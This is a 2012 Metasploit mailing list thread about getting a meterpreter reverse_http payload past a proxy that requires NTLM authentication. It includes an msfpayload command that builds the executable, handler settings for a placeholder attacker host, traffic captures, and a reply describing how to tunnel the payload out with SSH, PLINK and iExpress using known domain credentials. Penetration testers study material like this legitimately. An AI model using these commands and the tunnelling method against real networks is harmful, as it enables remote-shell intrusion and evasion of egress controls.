Metasploit mailing list archives
Re: meterpreter ntlm proxy bypass
From: audio audience <audience099 () gmail com>
Date: Fri, 13 Apr 2012 21:58:34 +0300
Thanks for answer. First of all, is meterpreter can access basic authentication proxy ? Then, I changed my network labs. I setup a MS TMG server and enabled integrated auth. If computer is joined active directory, it's can access to internet over TMG. I ran meterpreter reverse_http payload, meterpreter automatical connect to proxy ip and port and get http request but it's doesn't complete NTLM auth. and TMG blocked this request. I saw the meterpreter traffic via wireshark, MS TMG is blocked meterpreter's http traffic; GET http://x.y.z.t/8YyR HTTP/1.0 Host: x.y.z.t Pragma: no-cache HTTP/1.1 407 Proxy Authentication Required ( Forefront TMG requires authorization to fulfill the request. Access to the Web Proxy filter is denied. ) Via: 1.1 WIN-1ADVF Proxy-Authenticate: Negotiate Proxy-Authenticate: Kerberos Proxy-Authenticate: NTLM Proxy-Authenticate: Digest qop="auth",algorithm=MD5-sess,nonce="+Upgraded+xh2sa123da14de32b881d8f64c125075a269ad11f1acd019f21333a41c0025df240d348959c41028a80443ef67b52380888306094e49f99",charset=utf-8,realm=" xyz.com" Connection: Keep-Alive Proxy-Connection: Keep-Alive Pragma: no-cache Cache-Control: no-cache Content-Type: text/html Content-Length: 4128 Are you have any idea for this subject ... 2012/4/11 Sherif El-Deeb <archeldeeb () gmail com>
If the logged in user already is a member of the domain, is allowed internet access and the machine is joined to the domain, then reverse_http SHOULD go through the system configured proxy even with NTLM auth, no problem (thanks HD & Mubix!) ... (if you meet that criteria already try setting the LPORT at the mutli/handler to 80 since that might be the only port allowed). however, if the logged in user is not allowed internet connection, or the machine is not member of the domain (i.e. everythime you connect to the internet it pops-up asking for creds) you have to have the following: 1- You have to know the username, password and domain of an allowed-internet user. 2- the Proxy IP and port 3- you have to bundle "meterpreter" with a "NTLM-Auth-proxy-aware" program to tunnel through the connection for you, a tested-and-guaranteed example would be (SSH server listening on 443) + (PLINK with the -L switch) + (meterpreter with LHOST set to 127.0.0.1) + (some command-line kung-fu to add the host SSH key and glue everything together) + iExpress. As far as I know, there's nothing built-in that allows you to specify a username, pass, domain and the proxy:port to meterpreter :) I think I'll write a blog post about this someday :) but please beware that you have to know lots of things in advance to make this work. Sherif Eldeeb On Wed, Apr 11, 2012 at 10:49 PM, audio audience <audience099 () gmail com> wrote:Hello Everyone, I want to bypass ntlm supported proxy bypass with meterpreter. I tested it in my Labs; all outgoing traffics blocked by firewall for client. If client want to access internet, it's need to set windowsusernameand password to ntlm auth. proxy. I created meterpreter payload this following options; # msfpayload windows/meterpreter/reverse_http LHOST=x.y.z.t LPORT=8080 AutoRunScript='migrate2 iexplore.exe' X > /var/www/8.exe For listening mode; msf exploit(handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (windows/meterpreter/reverse_http): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique: seh, thread, process, none LHOST x.y.z.t yes The local listener hostname LPORT 8080 yes The local listener port Exploit target: Id Name -- ---- 0 Wildcard Target msf exploit(handler) > exploit [*] Started HTTP reverse handler on http://x.y.z.t:8080/ [*] Starting the payload handler... And then i ran 8.exe to victim computer but proxy is blocked meterpreter http connection, because meterpreter didn't complate ntlm auth. Squid Log; 1334171617.857 0 a.b.c.d TCP_DENIED/407 1744 GET http://x.y.z.t:8080/l2eY - NONE/- text/html How i can bypass ntlm auth. with meterpreter payload. Thanks for supports _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- meterpreter ntlm proxy bypass audio audience (Apr 11)
- Re: meterpreter ntlm proxy bypass Sherif El-Deeb (Apr 11)
- Re: meterpreter ntlm proxy bypass Adrián Puente Z. (Apr 12)
- Re: meterpreter ntlm proxy bypass audio audience (Apr 13)
- Re: meterpreter ntlm proxy bypass Sherif El-Deeb (Apr 13)
- Re: meterpreter ntlm proxy bypass Sherif El-Deeb (Apr 11)